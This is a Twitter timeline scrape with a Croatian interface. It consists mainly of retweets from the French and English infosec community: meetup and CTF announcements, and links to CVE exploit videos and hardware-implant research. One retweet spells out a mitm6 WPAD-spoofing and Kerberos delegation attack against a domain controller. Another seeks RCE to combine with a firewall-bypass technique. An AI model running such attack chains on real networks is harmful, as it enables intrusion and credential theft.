Tweetovi

Blokirali ste korisnika/cu @blablablabc

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @blablablabc

  1. proslijedio/la je Tweet
    31. sij

    After showing a tool which remotely enumerates&destroys an cable if connected to a blue team controlled WiFi (for Internet upstream), made a clear point that this is not how the cable should be deployed. So I ported the tool to NMAP scanner 1/2

    Prikaži ovu nit
    Poništi
  2. proslijedio/la je Tweet
    30. sij

    Vous pouvez trouver les sources du by avec les writeups et les scripts de solve pour chacun des challenges à l’adresse suivante 😊 La Ruche by

    Poništi
  3. proslijedio/la je Tweet
    29. sij

    Bien joué à notre team ! 4ème au challenge CDAISI du FIC 😁 On enchaîne avec le gg

    Poništi
  4. 27. sij

    Merci pour la soirée ! Des conférences très intéressantes !!

    Poništi
  5. proslijedio/la je Tweet
    27. sij

    Merci à tous et notamment à nos speakers pour cette édition de la ! On se retrouve le lundi 24 du mois prochain ! Bonne soirée à tous et bon / 😎

    Poništi
  6. proslijedio/la je Tweet
    27. sij

    An extra lecture is planned for tonight! Thus, will talk about internal CTF organization (more information on ) As we now have three talks, we've made a planning 😉

    Poništi
  7. proslijedio/la je Tweet
    27. sij

    Si vous êtes à Lille pour CorIIN dès ce soir, n'hésitez pas à passer au Dernier Bar avant la fin du monde, je donne une prés sur des groupes utilisant différents services cloud pour des attaques ciblées, et comment en tirer parti en tant que défenseur

    Prikaži ovu nit
    Poništi
  8. proslijedio/la je Tweet
    27. sij

    Rendez-vous ce soir au dès 19h pour la ! 👀

    Poništi
  9. proslijedio/la je Tweet
    25. sij

    Update the list of current USB cables with implants for keystroke injection attacks & more

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    22. sij

    Lundi soir prochain nous parlerons de la protection des réseaux automobiles avec , puis présentera un talk sur l’utilisation du cloud comme infrastructure d’hébergement de malwares ! Pour plus d’infos :

    Poništi
  11. proslijedio/la je Tweet
    19. sij

    If you want to understand the real risk of CVE-2020-0601 in the crypt32 dll and how it can be exploited, read this excellent blog from

    Poništi
  12. proslijedio/la je Tweet
    17. sij

    I just published a video explaining the details of CVE-2020-0601 aka Curveball: The Microsoft CryptoAPI vulnerability that was reported by the NSA.

    Poništi
  13. proslijedio/la je Tweet
    18. sij

    Nous avons trouvé nos deux speakers :) Les talks seront annoncés dans le courant de la semaine !

    Prikaži ovu nit
    Poništi
  14. proslijedio/la je Tweet
    17. sij

    Nous sommes toujours à la recherche d’un second talk pour la du 27 ! Si vous souhaitez présenter un sujet qui vous intéresse, envoyez nous une brève description par DM ! 😎 cc

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    14. sij

    Big move forward for the Bluetooth LE interception dongle BLExy. Beside MitM, monitoring and intercepting BLE data, I added some async JavaScript functions to generate data. Demo: arbitrary keys injected into a Logitech mouse, paired over Bluetooth!!!

    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    13. sij

    Should we talk about the Citrix RCE? 👀👀👀 and I made a video: Enumerating, Analyzing, and Exploiting The Citrix ADC Remote Command Execution - CVE-2019-19781. It's already demonetized by YouTube so enjoy! 😂

    Prikaži ovu nit
    Poništi
  17. proslijedio/la je Tweet
    7. sij

    It's 2020 and you have NetBIOS, LLMNR, SMB sign off but WPAD is still on. EWW! mitm6 -i eth0 -d <domain> -t ldaps://<DomainController> -wh attacker-wpad --delegate-access export KRB5CCNAME=<TGS_ccache_file> –k –no-pass <VictimPC>

    Poništi
  18. proslijedio/la je Tweet
    6. sij

    Tout d'abord, nous vous souhaitons une bonne année 2020 ! 🎆 Un deuxième créneau de conférence est encore disponible pour la du 27/01 ! N'hésitez pas à nous envoyer vos propositions de sujet par DM ou mail

    Poništi
  19. proslijedio/la je Tweet
    5. sij

    I've developed a new technique for bypassing firewalls/NATs and producing full TCP/UDP session to targeted user. Anyone have RCE for a service that's typically only run behind NATs (eg desktop software like Sonos, Spotify, Dropbox, etc which bind to *) and want to merge projects?

    Poništi
  20. proslijedio/la je Tweet
    31. pro 2019.

    Less than 10 hours left, RIP Python 2 😭

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·